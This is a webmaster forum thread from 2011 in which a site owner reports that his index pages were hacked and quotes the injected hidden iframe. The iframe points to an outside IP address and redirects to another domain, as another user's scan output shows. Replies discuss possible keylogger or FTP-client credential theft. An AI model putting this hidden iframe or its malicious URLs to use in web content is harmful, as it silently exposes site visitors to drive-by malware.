Server hacked - I am infected - Webmaster General forum at WebmasterWorld

Forum Moderators: phranque

Message Too Old, No Replies

Server hacked - I am infected

by accident I opened an inefected file

jetteroheller

3:36 pm on Jan 22, 2011 (gmt 0)

Today, all my accounts had been hacked

All index.htm had been downloaded,

ATTENTION - here follows the malware code

<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=94084c73145a76e12ac6c2169dc3cb17&hashpage=07ff9fc87b87022c88d55c5fb050314a" width=10 border=1 height=10 style="visibility:hidden"></iframe>

and uploaded again with this at the end.

By accident, I visited a page with this code.

My notebook has Windows 7 and MSIE 8 with latest updates.

Can my notebook be infected by this code?

jimbeetle

5:42 pm on Jan 22, 2011 (gmt 0)

Yeah, a lot of sites get hacked because a keylogger was downloaded to the local machine first. Get your host to scrub your sites while you're disinfecting your notebook.

Key_Master

5:50 pm on Jan 22, 2011 (gmt 0)

I sent a bot in to follow the link in the iframe and didn't find any malicious code at the other end. This doesn't mean you haven't been infected and the sites are definately suspicious. I would recommend that you be proactive and takes step to clean your laptop and change all passwords just to be on the safe side.

>Scanned: http:/80.91.191.158/stats/priemIframe.php?part=2&hashftp=94084c73145a76e12ac6c2169dc3cb17&hashpage=07ff9fc87b87022c88d55c5fb050314a
>Base URL: http:/finnerdy.com/tw61xx3lmks.php?s=IBCFA
>Redirected 1 times.

HTTP/1.1 302 Found
Connection: close
Date: Sat, 22 Jan 2011 17:41:33 GMT
Location: http:/finnerdy.com/tw61xx3lmks.php?s=IBCFA
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Client-Date: Sat, 22 Jan 2011 17:40:23 GMT
Client-Peer: 80.91.191.158:80
Client-Response-Num: 1
X-Powered-By: PHP/5.2.16

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 22 Jan 2011 17:40:23 GMT
Pragma: no-cache
Server: nginx/0.6.32
Content-Type: text/html; charset=Windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Sat, 22 Jan 2011 17:40:23 GMT
Client-Peer: 98.142.241.170:80
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
Set-Cookie: PHPSESSID=ad22e868d5c565b15efce87400a69994; path=/
X-Powered-By: PHP/5.2.6-1+lenny9

jetteroheller

5:54 pm on Jan 22, 2011 (gmt 0)

Yeah, a lot of sites get hacked because a keylogger was downloaded to the local machine first. Get your host to scrub your sites while you're disinfecting your notebook.

It's the 3rd case.

In no case was anything found on the local computer.

Also I never type my passwords. They are all used by my software.

rocknbil

7:17 pm on Jan 25, 2011 (gmt 0)

Are you running Wordpress?
A link of interest [webmasterworld.com], be sure to see the "sighting" links I posted in that thread too. It's not *always* a virus or keylogger.

Seen this one before too.

jetteroheller

7:51 pm on Jan 25, 2011 (gmt 0)

I have my own CMS system.

My system with compressed delivery decreased the effect:

Without compressed delivery:

Many visitors get an infection
Google shows a warning for malware site

With compressed delivery, all html files are gunzip compressed.
Visitors see only an error message "Trailing garbage at decompression"

jetteroheller

7:51 pm on Jan 25, 2011 (gmt 0)

int13

9:04 pm on Jan 25, 2011 (gmt 0)

Hi there,

you are not the only one. Many servers are hacked like this every day. On my blog i analyzed the malware.

You may have used Filezilla to transfer your files. So mostly all of your hosts may be compromised.

[integer13.wordpress.com...]

Hope this helps,

Andre